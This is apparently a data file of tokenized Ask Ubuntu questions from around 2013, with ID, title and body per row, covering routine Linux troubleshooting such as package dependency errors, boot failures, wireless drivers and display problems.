299781	sharing a 1 gb file that can be stream more then 10 computer	i want to share a avi file which capacity is 1 gb and my os is linux ubuntu 12.10 via a wireless router by the name of tp-link . i want to share this file and at least 10 computer capable to play the file simultaneously can every one help me to share this file consider that i share it via samba and appache2 but i cant stream or play more then one or two computer thanks in advance
299786	why doesnt ubuntu 13.04 prompt me for a password after suspend ?	i am on 13.04 and waking from suspend takes me straight to desktop without a password prompt even though it is set to ask for a password in the brightness and lock settings . also i recently tried to lock my computer , going to the power menu in the top right corner and hitting lock , it does not do anything , i am still on the desktop.. ( just tried crtl alt l to lock , it does work ) but not the way i did it though , but that is not important to me , i need the password prompt after suspend.. password prompts works only when booted from a shutdown ...
299787	skype 4.2 in ubuntu 13.04 wo n't open in nvidia optimus laptops	actually this is an answer . im not asking a question . last day , i tried to install skype 4.2 on my dell n5110 with nvida optimus , after the installation when i tried to open skype from dash it did n't open . so then i opened it with terminal via skype and it gave me an error error while loading shared libraries : libgl.so.1 : can not open shared object file : no such file or directory so i did the following steps with the help of method mentioned in this link . steps : open a terminal and type sudo nano /etc/ld.so.conf.d/skype.conf add the code /usr/lib/i386-linux-gnu/mesa/ in the next console window , and press ctrl+x to exit , when prompted enter y to say yes and finally run sudo ldconfig -v
299789	experiencing problems while trying to upgrade to pangolin	i decided to upgrade to 12.04 and in the middle of it my laptop lost its power . now i 'm getting the grub screen when i start my laptop , and when i go for the `` recovery mode '' , i 'm getting this : i also tried to reboot from usb in bios and i 'm getting the `` boot error '' . i also do n't have ubuntu live cd and i do n't know what i 'm doing wrong . can anyone help me please ? thank you in advance !
299792	why is the command in /etc/rc.local not executed during startup ?	i have a single command in my /etc/rc.local script that is supposed to start the update daemon for tiny tiny rss during startup , but the script is not executed during startup . why ? the entire /etc/rc.local file : # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . /sbin/start-stop-daemon -b -c www-data : www-data -s -x /usr/bin/php /var/www/ttrss/update_daemon2.php -- -quiet exit 0 /etc/rc.local is executable : # ls -l /etc/rc.local -rwxr-xr-x 1 root root 342 may 25 16:14 /etc/rc.local /etc/init.d/rc.local exists and is executable : # ls -l /etc/init.d/rc.local -rwxr-xr-x 1 root root 801 jul 27 2012 /etc/init.d/rc.local /etc/init.d/rc.local is supposed to be executed at startup for this runlevel : # runlevel n 2 # ls -l /etc/rc2.d/s99rc.local lrwxrwxrwx 1 root root 18 sep 22 2012 /etc/rc2.d/s99rc.local - > ../init.d/rc.local if i manually call /etc/rc.local from the command line the update_daemon loads ... # /etc/rc.local # ps ax | grep update_daemon2.php 2233 ? s 0:00 /usr/bin/php /media/sda5/www/news/update_daemon2.php -quiet 2234 ? s 0:00 /usr/bin/php /media/sda5/www/news/update_daemon2.php -quiet ... which i have to remember to do every time my server restarts until this problem is fixed . similar questions already exist , but so far i 've been unable to apply the information within to my specific problem . why is the command in rc.local not executed during startup ?
299794	ca n't detect usb camera	i had two logitech cameras in which they are connected and working properly . but when they are connected by using two 10meter wires they are not working . what could be the reason .
299802	migrate git repositories	i have an old laptop ibm z61t as my git server . i want to upgrade my laptop server to a desktop server ( the laptop server will not use anymore ) . how could i setup and migrate the git repositories to my desktop server without losing histories . it 's quiet different from setting up a git server . thanks in advance .
299808	mapping windows key in gvim	how do i map the windows key in gvim ? i 've tried referencing it as t as suggested here and it does n't seem to work .
299812	ca n't install wine	i 've tried over and over , and over nothing seems to work . i always get this when i try to install wine : the following packages have unmet dependencies : wine1.4 : predepends : dpkg ( > = 1.15.7.2~ ) but 1.16.1.2ubuntu7.1 is to be installed depends : libc6 ( > = 2.14 ) but 2.15-0ubuntu10.4 is to be installed depends : libgettextpo0 but it is not going to be installed depends : wine1.4-amd64 ( = 1.4.1-0ubuntu1~precise1~ppa4 ) but 1.4.1-0ubuntu1~precise1~ppa4 is to be installed depends : wine1.4-i386 ( = 1.4.1-0ubuntu1~precise1~ppa4 ) but it is a virtual package still nothing . brian @ brian-laptop : ~ $ sudo apt-get purge wine* & & sudo apt-get install wine reading package lists ... done building dependency tree reading state information ... done e : unable to locate package wine1.4_1.4-0ubuntu4_amd64.deb e : could n't find any package by regex 'wine1.4_1.4-0ubuntu4_amd64.deb' e : unable to locate package wine1.4-amd64_1.4-0ubuntu4_amd64.deb e : could n't find any package by regex 'wine1.4-amd64_1.4-0ubuntu4_amd64.deb' e : unable to locate package wine1.4-common_1.4-0ubuntu4_all.deb e : could n't find any package by regex 'wine1.4-common_1.4-0ubuntu4_all.deb' e : unable to locate package wine1.4-i386_1.4-0ubuntu4_i386.deb e : could n't find any package by regex 'wine1.4-i386_1.4-0ubuntu4_i386.deb' e : unable to locate package wine-gecko1.4_1.4.0-0ubuntu2_amd64.deb e : could n't find any package by regex 'wine-gecko1.4_1.4.0-0ubuntu2_amd64.deb' brian @ brian-laptop : ~ $ sudo apt-get purge wine reading package lists ... done building dependency tree reading state information ... done package wine is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i do n't get it , i had 10.04 and it worked find untill i got the upgrade to 12.04 lts
299819	problems with skype ( 4.2.0.11 ) ? turns out , it 's tor !	i am not sure if i 'm looking at a network problem or a bug here . since the update to 4.2.0.11 my skype ca n't connect any more . my room-mate has the same problem . we 're both on ubuntu raring ringtail 13.04 on an elitebook 9470m in my case . does anyone have the same problem , or do you know of a bug-report ? ( update : turns out it 's neither a bug nor a network problem . tor exit-nodes are blocked by microsoft . see my answer below ! ) both purge-reinstall ( including the removal of ~/.skype ) and using the .deb from skype.com ( version 4.2.0.11_1 ) instead of the repositories did not help . running skype from the command line did not give additional messages . i do n't know how to decode the log files in ~/.skype/logs but the usual logs in /var/log/ show no anomalies . changing the port skype uses to one that is forwarded to my machine by the router , did not work either . nor did running skype as root . the fact that i can get it running on the same machine , when i use tethered connection of my mobile points towards a network problem , but then again other machines in our household have no problem at all and i did n't change any network configurations for half a year .
299822	which system calls will be used for command : cat < in ( in is an existing regular file ) ?	i am an undergraduate computer engineering student and this question is one of my system programming course 's exam question.actually the question is `` will not be used '' and the options are : open , create , read , write
299824	how to use circular scrolling using synaptics touchpad	i have used that feature in windows and i have always wanted to try that feature on this ubuntu raring.using gsynaptics does n't work it shows grey or deactivated buttons on circular scrolling . is there anyway of accomplishing this ?
299826	remove one of the 2 ubuntu 12.04 installed	i installed a second ubuntu-12.04 lts because the first one did n't work . they have the same name . now i want remove the one that does n't work . using the file explorer i can mount , format and unmount the `` device '' with the pop-up menu ( it is taken as a device by the system that works well ) . running format do i free the space occupied ( 127 gb ) ?
299827	how to import google contacts into ubuntu 13.04 ?	is it possible to import / link my gmail contacts address book with the online accounts feature of ubuntu 13.04 ? it does n't make sense that that functionality exists for twitter and facebook but not for gmail ... google does off course make this functionality available as i used to use it in kmail ...
299829	how should i change permissions ( dirs & files ) recursively in an mp3 external hard drive ?	this is not that simple as it sound , so please read carefully before answer ( i really tried before writing this ) . so , the problem is the following . i have an external hard drive , ntfs of 2tb . it is meant to be only for movies and music . so , i have a music folder that have several other folders and subfolders ( artist , disc1 , disc2 ... in any possible combination that you can imagine ... -im not an organized guy ) . inside them there are music files , mainly mp3 , but also .flac , .ogg and .cue files . for some reason ( i really do n't get why ) some files have restricted permissions on the writing , so i can not edit the mp3-tag info using software like rhythmbox or even some things more specific like easytag . whatever , the point is not the software , but the permission of the files . since my idea is to edit the tag-metadata-info from rhythmbox and i just ca n't because the field is blocked -gray colored , i ca n't write on it , for example , to change the artist names- , i was wondering the ways to change the file permissions recursively . and we arrived to the point . i 'm needing some help to make a script or a `` one liner '' to : 1 ) identify the files and folders that have permissions different from 777 . 2 ) a ) on that cases , enter into each folder-subfolder , b ) change the folder permissions to `` 777 '' -meaning full access , are mp3 guys , i do n't care about security there- c ) change every file permission on each subfolder to `` 777 '' full access . i have a lot of music , so no way to do it manually . any help , clue , or comment will be really appreacited , thanks in advance ! ! !
299830	problems with vim-r	getting the following error when opening an .r file in vim ( vim-r installed ) . error detected while processing /home/johnros/.vim/r-plugin/common_global.vim : line 3106 : e484 : ca n't open file /tmp/viukjzl/0 line 3327 : e484 : ca n't open file /tmp/viukjzl/1 i have also imported my .vim library and .vimrc from another pc where it works nicely , so i suspect it might have to do with my environment variables . running fish shell , but also tried on bash . any ideas ? update : when ssh'ing to a remote pc , if i tmux before ssh'ing , the problem persists . if i tmux after ssh'ing , there is no problem . tmux on local machine is 1.9 and on remote 1.5 . i thus suspect vim-r does not support tmux > 1.5
299834	vala and packages	i 'm trying to make an ubuntu app in vala . i do have knowledge of c++ so the syntax is n't that difficult to learn . but i 'm doing something wrong with the needed packages : i need libsoup to communicate with an online api , and a json package . i tried to compile with this command : valac -- thread -- pkg libsoup-2.4 -- pkg json-glib-1.0 json-example.vala i get following error : /home/brendt/programs/vala/json-example.vala.c:9:26 : fatal error : libsoup/soup.h : no such file or directory compilation terminated . error : cc exited with status 256 compilation failed : 1 error ( s ) , 0 warning ( s ) so this makes me think i have n't installed that libsoup package in the correct place . i tried apt-get install , but than ubuntu says the package is already installed . than i tried cloning from git , but i do n't really find a way to compile the source i get than.. anyone has some suggestions ? i probably have to add a correct path somewhere , but i do n't know where . regards , brendt
299839	auto boot after power failure - laptop	i 'm using a laptop with lubunut on it for a project i 'm working on in a remote location . i chose a laptop because of the batter already attached and the frequent power outages . most power outages are only for an hour or so , which the laptop will be fine on . but occasionally there are power outages that can last an entire day . i would like the laptop to be able to boot automatically when it has ac power attached ( such as if the battery completely died ) . unfortunately , it 's a cheap laptop toshiba nb 200 and the pheonix bios does not have any settings for boot after power failure . i could not find a bios update , but it seems silly that a laptop bios would be built in with this feature . so , my question is , `` does this have to be a bios setting or is there some software for ubunutu that would handle this ? '' such as : `` if the system shuts down , automatically boot the computer at 6:00am the next day . '' the other thought i had was to hook some wires up to the power button switch and use a relay to `` push '' the button when it has ac power . thanks for the advice !
299843	undefined reference when using gfortran to compile fortran 77 code	i have an old fortran 77 code , which compiles well on sun workstation . however , there are errors when i try to compile it using gfortran on ubuntu ( 64 bits ) : $ gfortran -wall -g -jobj/debug/ -ffixed-form -lc -lm -lg2c -c main.for -o obj/debug/main.o the following is the information given by gfortran 3015 main.for|32994| undefined reference to `qextd_' 3016 main.for|33000| undefined reference to `qextd_' 3017 main.for|33000| undefined reference to `qmod_' 3018 main.for|33000| undefined reference to `dbleq_' 3019 main.for|33015| undefined reference to `dbleq_' 3020 main.for|33015| undefined reference to `dbleq_' how can i solve this problem ?
299845	unable to login after changing user password	my problem already listed in the forum but unfortunately it is closed and no satisfying answer available in that post . so , i am opening a new thread . i am using ubuntu 13.04 . i changed my password using passwd command for the user . ex : suppose 'xyz ' is the username i am using to login . i used this command to change the password of that user : sudo passwd xyz it prompted me to enter my current password and later new password twice . everything is fine . but after changing user password successfully , i log-out and tried to log-in . i failed . after entering my password and pressing enter , it simply goes blank for 1 or 2 seconds and re-appears the log-in screen . i am unable to enter . at the time of installation i used `` encryption of home folder '' option . so , i am unable to access my data from windows . ( as you know that we can have read access of linux partition using some softwares ) . please help and thanks in advance .
299846	desktop ubuntu 12.04 fails to boot	i 'm using a samsung ultrabook . i used the windows installer to install ubuntu 12.04 . when i restart pc i get an option to choose which boot to use . if i choose windows 8 - everything is fine . no problems with windows 8 . if i choose ubuntu the boot fails . there is this information on the black screen : \ubuntu\winboot\wubildr.mbr status : 0xc000007b required file contains errors i 'm not sure what is wrong or how to fix it . can anyone help ?
299849	editing the environment variable	i have been trying to edit the environment variable . i had read this and in the section of persistent environment variable - > system-wide environment variables it is written to change the /etc/environment file , but even after doing that the variable is same as before . but when i echo $ path as root user the change is reflected . i have read many questions regarding this on the site but many of the answers given are not recommended according to the article given in the link above .
299852	rabbitvcs wo n't show in nautilus on ubuntu 12.04	i 'm using ubuntu 12.04 and have installed subversion 1.7.8-1+wandisco and rabbitvcs 0.15.3-1~precise ( the latter according to http : //wiki.ubuntuusers.de/rabbitvcs ) . the following packages are installed : rabbitvcs-cli , rabbitvcs-gedit , rabbitvcs-nautilus3 , rabbitvcs-core however , i ca n't see rabbitvcs in the context menu . i 've rebooted . i 've googled . all in vain . please help !
299858	time set through terminal resets after reboot	i set the the time using , e.g . sudo date -- set= '' 24 may 2013 18:00:00 '' sudo hwclock -- systohc -- utc this worked , but upon reboot the time was back to the old value . what am i doing wrong ? i thought hwclock would make it permanent . i notice in the gui time/date my timezone is still set to a different timezone and network time is set to on . so i wonder if it 's somehow autosyncing , or if i need also change the time zone at terminal ?
299860	packages have been unpacked but not yet configured	i am stuck with this weired issue . i am running ubuntu 12.04 sudo dpkg -- audit output is the following packages have been unpacked but not yet configured . they must be configured using dpkg -- configure or the configure menu option in dselect for them to work : network-manager-dbg : i386 network management framework ( debugging symbols ) network-manager : i386 network management framework ( daemon and userspace tools ) network-manager-gnome : i386 network management framework ( gnome frontend ) not sure what to do . i have also tried apt-get -f install output is the following packages have been unpacked but not yet configured . they must be configured using dpkg -- configure or the configure menu option in dselect for them to work : network-manager-dbg : i386 network management framework ( debugging symbols ) network-manager : i386 network management framework ( daemon and userspace tools ) network-manager-gnome : i386 network management framework ( gnome frontend ) reading package lists ... building dependency tree ... reading state information ... correcting dependencies ... failed . the following packages have unmet dependencies : gnome-bluetooth : breaks : network-manager-gnome : i386 ( = 0.9.4 ) but it is not installed breaks : network-manager-gnome : i386 ( = 2.4 ) but it is not installed depends : libdbus-1-3 : i386 ( > = 1.0.2 ) but it is not installed depends : libdbus-glib-1-2 : i386 ( > = 0.88 ) but it is not installed depends : libglib2.0-0 : i386 ( > = 2.31.8 ) but it is not installed depends : libgudev-1.0-0 : i386 ( > = 147 ) but it is not installed depends : libnl-3-200 : i386 ( > = 3.2.3 ) but it is not installed depends : libnl-genl-3-200 : i386 ( > = 3.2.3 ) but it is not installed depends : libnl-route-3-200 : i386 but it is not installed depends : libnm-glib4 : i386 ( > = 0.9.4.0~git201203162258.69247a0 ) but it is not installed depends : libnm-util2 : i386 ( > = 0.9.3.995+git201203081848.bba834f ) but it is not installed depends : libpolkit-gobject-1-0 : i386 ( > = 0.99 ) but it is not installed depends : wpasupplicant : i386 ( > = 0.7.3-1 ) but it is not installed depends : isc-dhcp-client : i386 ( > = 4.1.1-p1-4 ) but it is not installed depends : dnsmasq-base : i386 but it is not installed depends : iputils-arping : i386 but it is not installed recommends : network-manager-pptp : i386 but it is not installed recommends : ppp : i386 ( > = 2.4.5 ) but it is not installed recommends : iptables : i386 but it is not installed recommends : modemmanager : i386 but it is not installed breaks : network-manager-gnome : i386 ( = 1.29.3 ) but it is not installed depends : libc6 : i386 ( > = 2.4 ) but it is not installed depends : libcairo2 : i386 ( > = 1.2.4 ) but it is not installed depends : libdbus-1-3 : i386 ( > = 1.0.2 ) but it is not installed depends : libdbus-glib-1-2 : i386 ( > = 0.78 ) but it is not installed depends : libfontconfig1 : i386 ( > = 2.8.0 ) but it is not installed depends : libfreetype6 : i386 ( > = 2.2.1 ) but it is not installed depends : libgconf2-4 : i386 ( > = 2.27.0 ) but it is not installed depends : libglade2-0 : i386 ( > = 1:2.6.1 ) but it is not installed depends : libglib2.0-0 : i386 ( > = 2.18.0 ) but it is not installed depends : libgnome-bluetooth7 : i386 ( > = 2.27.8 ) but it is not installable depends : libgnome-keyring0 : i386 ( > = 2.20.3 ) but it is not installed depends : libgtk2.0-0 : i386 ( > = 2.16.0 ) but it is not installed depends : libnm-glib2 : i386 ( > = 0.8~rc2~git.20091229t135236.302e62d ) but it is not installable depends : libnm-util1 : i386 ( > = 0.8~a~git.20090930t162132.866d48b ) but it is not installable depends : libnotify1 : i386 ( > = 0.4.5 ) but it is not installable depends : libnotify1-gtk2.10 : i386 but it is not installable depends : libpango1.0-0 : i386 ( > = 1.14.0 ) but it is not installed depends : libxml2 : i386 ( > = 2.6.27 ) but it is not installed depends : zlib1g : i386 ( > = 1:1.1.4 ) but it is not installed depends : gksu : i386 but it is not installed depends : mobile-broadband-provider-info : i386 ( > = 20090622 ) but it is not installable recommends : notification-daemon : i386 any help will be much appreciated
299861	apt-hell broken dependancies for mysql server	'devillj @ bbj-ep45-ud3r : /var/log/mysql $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : mysql-server-5.5 suggested packages : tinyca the following packages will be upgraded : mysql-server-5.5 1 upgraded , 0 newly installed , 0 to remove and 5 not upgraded . 2 not fully installed or removed . need to get 0 b/8â 746 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? dpkg : dependency problems prevent configuration of mysql-server-5.5 : mysql-server-5.5 depends on mysql-server-core-5.5 ( = 5.5.31-0ubuntu0.12.04.1 ) ; however : version of mysql-server-core-5.5 on system is 5.5.31-0ubuntu0.12.04.2 . dpkg : error processing mysql-server-5.5 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of mysql-server : no apport report written because maxreports is reached already mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : mysql-server-5.5 mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) initially mysql did not start , but using mysql_safe starts it i dont care if i loose all of the mysql databases on my system , i just want apt to be happy again ...
299868	disable touchpad while typing does not work	i already checked that option in the settings but it wo n't work . i also searched for solutions in this site but none of those work . what should i do ?
299870	http post and get using curl in linux	i had server application in asp.net in windows in that i had a web service for that . how can i call web service in ubuntu using shell script by using curl command
299873	are the `` ubuntu core apps '' also intended for the desktop ?	i have been reading a lot about the ubuntu touch core apps initiative lately . given ubuntu 's device factor convergence plans and the cross-platform qt/qml foundation of the ubuntu sdk , is it the project 's intention to also bring the core apps to ubuntu desktop , thereby replacing their gnome counterparts as default applications ? this would make sense in the overall strategy - and would be an approach i would certainly favor as long as the apps properly adapt to desktop screen sizes and input devices - but it seems that it has n't been clearly communicated if this is a long-term ( or even mid-term ) goal or not .
299878	error executing sudo in chroot environmet	i am facing a strange problem while using a chroot 'd 12.04 ubuntu . when i try to run anything with sudo i get the following error : sudo : effective uid is not 0 , is sudo installed setuid root ? if i boot on the same system i 'm `` chroot'ing '' to sudo works as expected . what can be the cause of this ? how can i fix it ? additional info : [ user @ host / ] $ ls -la /usr/bin/sudo -rwsr-xr-x 1 root root 116928 12.05.2013 08:14 /usr/bin/sudo* to chroot i used this : http : //ubuntuforums.org/showthread.php ? t=1156240
299883	how to play games using bumblebee + wine 1.5	i recently moved to ubuntu after seeing `` it supports windows games '' . since i have a dual graphics card : intel 4000 and nvidia 630m , i installed bumblebee to make use of the graphics cards efficiently . 'optirun glxspheres ' or any program runs perfect . now , the problem is i need to play `` need for speed - most wanted ( 2005 ) '' . i have installed wine 1.5.30 and playonlinux . but , i ca n't play the game . also i just tried opening the speed.exe file and game worked fine ! now , my problem is , it uses the intel 4000 graphics . i need to make use of nvidia 630m . otherwise , spending money on nvidia 630m is a waste right ? so , can you please give me a step-by-step guide to help me sort this problem ? thank you : )
299884	how can i install ubuntu on a macbook 6.1 ?	i would like to install ubuntu on a macbook 6.1 ( mac osx 10.6.8 ) , but i do n't understand how to do so ... boot camp ( v3.0.4 ) gives me a message «impossible de continuer le téléchargement . le logiciel d'assistance windows n'est pas disponible.» some hours later : i 've success to start with a live-dvd ! so , i gave up with boot camp . the problem , actually , is `` how to resize the mas 's partition ? '' when i try to do this , the sisk utility says me the operation ca n't be accomplished because there are errors on the partition.. i 've to repair those but i do n't know how to process without the installation dvd of mac osx ... . sorry for this bad english , tell me for precisions if you need to !
299886	partitions . is it safe to move partition containing /boot ?	i am running dualboot ( windows 7 and ubuntu 12.04 ) and i would like to make more space for my ubuntu partition . i am doing it from a live cd through gparted . i was about to resize my windows partition to get unallocated space and resized my ubuntu to fill it . but then i got this : '' moving a partition might cause your operating system to fail to boot . you have queued an operation to move the start sector of partition /dev/sda3 . failure to boot is most likely to occur if you move the gnu/linux partition containing /boot , or if you move the windows system partition c : . you can learn how to repair the boot configuration in the gparted faq . http : //gparted.org/faq.php moving a partition might take a very long time to apply . '' i got scared and did n't dare to do it , but i still want more space on my ubuntu partition . what should i do ? thank you so much in advance markus
299887	adjust the brightness in 13.04	i have a dual graphics card : intel 4000 and nvidia 630m ... i installed bumblebee and intel drivers from their website . i thought the brightness problem will be solved by installing these drivers . but , brightness works only for two steps : that is , dim , medium , high ... but , it does n't increase step wise . can you please help me sort this problem ? i 'm a newbie to ubuntu and this is my first trial . so , please give me a detailed guide ... thank you : ) edit : my model is hp dv6 7040tx . my laptop model
299888	thunderbird keeps sleeping in the processes of ubuntu	i am working with ubuntu 13.04 but the problem was the same in the versions before : many times when i want to start thunderbird it rejects to start as `` still running '' and i had to `` shut it first '' . when i look for it i find it through system momitor under processes sleeping . there i first have to `` end the process '' , then i can start thunderbird . it happens with other programs also sometimes but most with thunderbird . how can i avoid this , that means : how to shut such programs , that they are really shut and not rejecting the restart ?
299894	how to install ubuntu 12.10 on already i.e preinstalled win 7 or win8 pc ?	how to install ubuntu 12.10 on already i.e preinstalled win 7 or win8 pc ? please tell me with out deletion of my files..nothing should happen to my pc files which i installed on win 7 or 8
299895	how to automatically synchronize phpmyadmin on two lampservers ?	my setup for my website is that i have a load balancer server , and two lamp servers and on the two lamp servers i have phpmyadmin installed . i have synced the two lamp servers /var/www folders with unison and work perfectly.. what i am wanting to know is or does anyone know how to synchronize phpmyadmin database for the one website ( as this whole setup is for 1 website only.. ) ? because i use the load balancer server to direct traffic to either server and the website is on both lamp servers ... just want to know is there a way that i can synchronize the databases as i am using phpmyadmin or can it be done that the 1st lampserver is configured to the phpmyadmin installed on there and that the 2nd lampserver can connect to the 1st lampserver 's phpmyadmin is that possible ? first machine : zen load balancer ( server ) second machine : lampserver ( webserver1 ) holds the website files that sync with webserver 2 third machine : lampserver ( webserver2 ) holds the website files that sync with webserver 1 or should i create another machine that just has phpmyadmin on it and holds the database for website directing the two lamp servers to connect to this machine ? ? how can this be done ? ? any help would be much appreciated.. all servers except zen load balancer are running ubuntu 12.04 lts server os
299897	issues with broadcom wireless 4313 - brcmsmac driver is very slow	i have an ubuntu 12.04 lts on lenove thinkpad edge having broadcom 4313 wireless . there are a lot of posts on getting 4313 wireless to work . for me , the only driver that works is brcmsmac . after booting i have to type the following commands to get the wireless to work sudo modprobe -r b43 wl brcmsmac sudo modprobe brcmsmac if i enable b43 , it is not detecting the wireless . wl keeps on trying to connect and is unable to connect . brcmsmac works in my computer . in many posts , i have seen that with 4313 chipset brcmsmac is the most dependable . i am ok with that . 1 ) at present the default driver loaded is wl . how can i change this to brcmsmac ? i have blacklisted wl b43 etc in the blacklist ... but somehow this is not working ? 2 ) brcmsmac although works , is very slow . how do i get this to work fine any advice on how to proceed thanks again
299899	can not access my d : drive in ubuntu ?	i have two 1 tb drives , c : and d : on my computer . i was running windows 8 on the 30 day trial . i installed ubuntu recently , now i can not see my d : drive anywhere , no matter where i look or search . i have just one drive with the 1 tb showing . any ideas ?
299909	how to update evolution mail client in xubuntu 12.04	i 'm using xubuntu 12.04 , and i need to upgrade evolution mail client from 3.2.3 to the latest version . thanks .
299910	removing all folders from ubuntu one to start over	how do i remove all folders to basically start over ? i only seem to be able `` unsync '' them , the folders are still there . i would like to be able to clean the slate as it were .
299911	graphic problems with chicken invaders and epsxe	my windows vista keeps rebooting on the green bar load screen so i got ubuntu 12.04 and installed it but i had trouble running my games and apps from vista until some guy on line told me to get wine which i did and my apps started loading but when i tried to run dawn of war dark crusade it launched but did not display in full screen ( no biggie ) the ubuntu side bar was still there on the side and so was the task bar ( if thats what its called ) at the top . but after the cut screen the loading page with all the logos appeared and the game closed ( not cool ) i kept trying until i finally gave up and run chicken invaders which launched properly but had some graphic bugs on the menu then i tried to run epsxe and play final fantasy but during combat i could not see the status bar at the bottom . i dont think this is a problem with my hardware because all the run just fine on my vista . can someone tell me how to fix this i will be grateful ( and if you know how to fix my vista issue it will be of great assistance . )
299913	how to enable mobile ( gsm ) network on ubuntu touch nexus 4	have installed ubuntu touch on my nexus 4 today . but , there is no mobile network and not sure the gsm radio got enabled or not . could you help me to enable the gsm radio to use it as phone . thanks for your help in advance .
299917	kaspersky antivirus deleted the \ubuntu\winboot folder	i have window 7 and ubuntu 10.04 in same partition ( with wubi ) and ubuntu 12.04 on separate partition of my dell inspiron 4030 laptop . i installed kaspersky antivirus and scanned my laptop , but after reboot i could no longer boot into the wubi 10.04 install . starting windows did n't succeed . the reason may be changing software . to solve this problem : 1 . insert installation disc of windows and reboot pc 2 . choose language settings and click next 3 . use repair if you dont own this disk contact with the administrtor . file : \ubuntu\winboot\wubildr.mbr state : 0xc000007b information : could not load application or operating system because of the lack of the required file or errors in this file please help me ... i have very important data in ubuntu 10.04 that i do n't want to lose .
299920	backlight control bar not working	i upgraded my 12.10 to 13.04 and the brightness control has completely disappeared ! in the settings tab all the options are available except the brightness control bar i have attached the screenshot below . i tried all the methods mentioned in the other threads including editing the /etc/default/grub file . another method i found was to manually change brightness by going to /sys/class/backlight directory but that directory is empty for me and contains no files ! currently the brightness of the monitor is at max and not usable for long duration and also drains the battery quickly . i have acer v5-571g which has the nvidia optimus and i have installed bumbulbee .
299922	unity does not start after booting	i 'm using a relatively new installed ubuntu 13.04 with all updates . my video driver is installed from the official amd website and worked before without trouble . after the latest update , unity did not start anymore ( i think ) . the launcher and the top bar did not appear , so the only thing i could see was the background and the desktop icons ( so nautilus was useable ) . but there was no window frame around the windows , so i was not able to see the close-button and so on . i thought this is probably caused through the video driver ( installed using amd-catalyst-13.4-linux-x86.x86_64.run installer file ) . so i ran it again . now , the frames around the windows are back . but the rest stayed as before . is it possible to get everything working again without installing everything new ? i would also use the opensource or the proprietary video driver from software-properties-gtk , but it does not allow me to `` downgrade '' or choose the open source driver . if you need any additional information just tell me . thank you . ps : i can imagine this was already answered , but i could not find any working answer and it would be good if i could use my computer normally soon . update : i changed to the open source driver using the instructions from an answer below , but functionally nothing changed . unity still does not show up .
299923	colored lines on startup	i have a dell inspiron 1501 running ubuntu 13.04 . when i start up my computer there will just be a black screen with colored vertical lines . when i here the startup sound i can close my computer wait for a bit then open it and it will show the normal lines again . sometimes after a kernel update the lines will go away and i will see the login screen but they come back after the kernel updates again . are there better graphics drivers i can install . these lines also appear when i try to launch tremulous and i can still hear sound in the background so i think it is a graphics error . i have a amd mobility radeon xpress 200 graphics card and i am running the default graphics drivers installed by ubuntu . i followed the instructions at this link . but it said my device was to old and unsupported . this is what the lines look like .
299928	why are python3 and python3.3 separate directories ?	i 'm working on getting pygame set up so i can read and follow making games with python & pygame , and when i was looking in /usr/lib , i saw that while python2.7 had a single directory , there were two python3 directories : python3 , which contains only the dist-packages directory python3.3 , which contains all the other python directories why are these separate ? can i combine them into the python3.3 directory ? i just do n't want to find out later that because these were separate ( for whatever reason ) , things are messed up/wo n't work right .
299929	how to setup ubuntu on a motherboard raid , no alternate image	this is something that took me an extraordinary amount of time to iron out , and the literature is distributed over several websites . i also did n't like the idea of doing it through the alternate cd , as i thought software raid ( slightly ) inferior to doing it through the bios . also , only a select number of distros actually possess the alternate install iso , and the usb support for them is a little weak . anyways , i thought i could write the step-by-step that worked for me . 1 ) start by setting up the bios raid . 2 ) boot into a live usb ubuntu distribution of your choice . 3 ) open gparted and partition the raid as follows : ( i ) 500 mb ext partition for grub . ( ii ) ext partition with all remaining data . ( iii ) a swap partition of equal size to your ram . *these statements are modifiable . for example , i setup a 4 gb swap partition since i have 16 gb of ram , and have never actually seen it used but wanted to be safe . also , of the 500 mb partition which is recommended uniformly across the interwebs , it currently only occupies about 75 mb . 4 ) start the installer , and proceed as usual until it asks for the install option . select `` something else '' or `` advanced options '' , depending on distribution , to open the built in partition manager . select partition ( i ) created above and hit `` change '' . select ext4 ( or any ext of your choice ) journalling system , format , and set it to `` /boot '' . similary , select partition ( ii ) , hit `` change '' , ext4 , format , and set it to `` / '' . then proceed with the installation . 5 ) nearing the end of the install , it will tell you it failed to install grub at the current location , and ask you to relocate it . use `` continue without a bootloader '' . 6 ) at the end it will ask you if you are ready to restart , or continue testing . select the latter option . 7 ) run the following commands in terminal : sudo add-apt-repository ppa : yannubuntu/boot-repair sudo apt-get update sudo apt-get install -y boot-repair 8 ) open boot-repair , which should find the $ /boot $ partition created earlier , and hit the recommended repair option , follow the steps putting the necessary commands into terminal and it will tell you at the end that grub was repaired successfully . as a reference , 'https : //help.ubuntu.com/community/boot-repair ' . 9 ) reboot into your new ubuntu-ready-computer ! hope this works , reply if you have any issue .
299932	how do i update my billing information ?	i need to update my billing information to add a new credit card , but i can not seem to find the place to do this on the website . help would be very much appreciated .
299933	my computer is extremely slow with ubuntu 13.04	i installed ubuntu 13.04 on a hp pavilion 7000 with `` graphics driver '' vesa : nv31 board-e133nz . i have no idea what graphic card is in the machine . the installation seemed to be good . then , booting from the hd , the screen went black . i had to use a separate monitor to see , but just before the login screen , this monitor also went black . i booted in safe mode and only the separate monitor worked . i tried many sudo commands that i saw on the internet but nothing worked . i then went to the bumbelebee site and installed their driver , and now i can boot and see the laptop monitor . however , the computer is so slow that i have to wait 6 1/2 minutes for it to boot . i timed it and all the other stuff is just as slow .
299935	i want to put ubuntu on a bootalbe external usb hard drive	putting ubuntu on a bootable external usb drive looks pretty straight forward but i might need a little help ... i 'm only on chapter 8 of a 30+ chapter book ... my problem is i have to 3 different pcs with different motherboards , video cards , etc ... the plan is to carry my usb drive to the pc i want to use , plug it in and reboot the system ... is this going to be a problem , will ubuntu configure it 's self for the current hardware and let me focus on learning ?
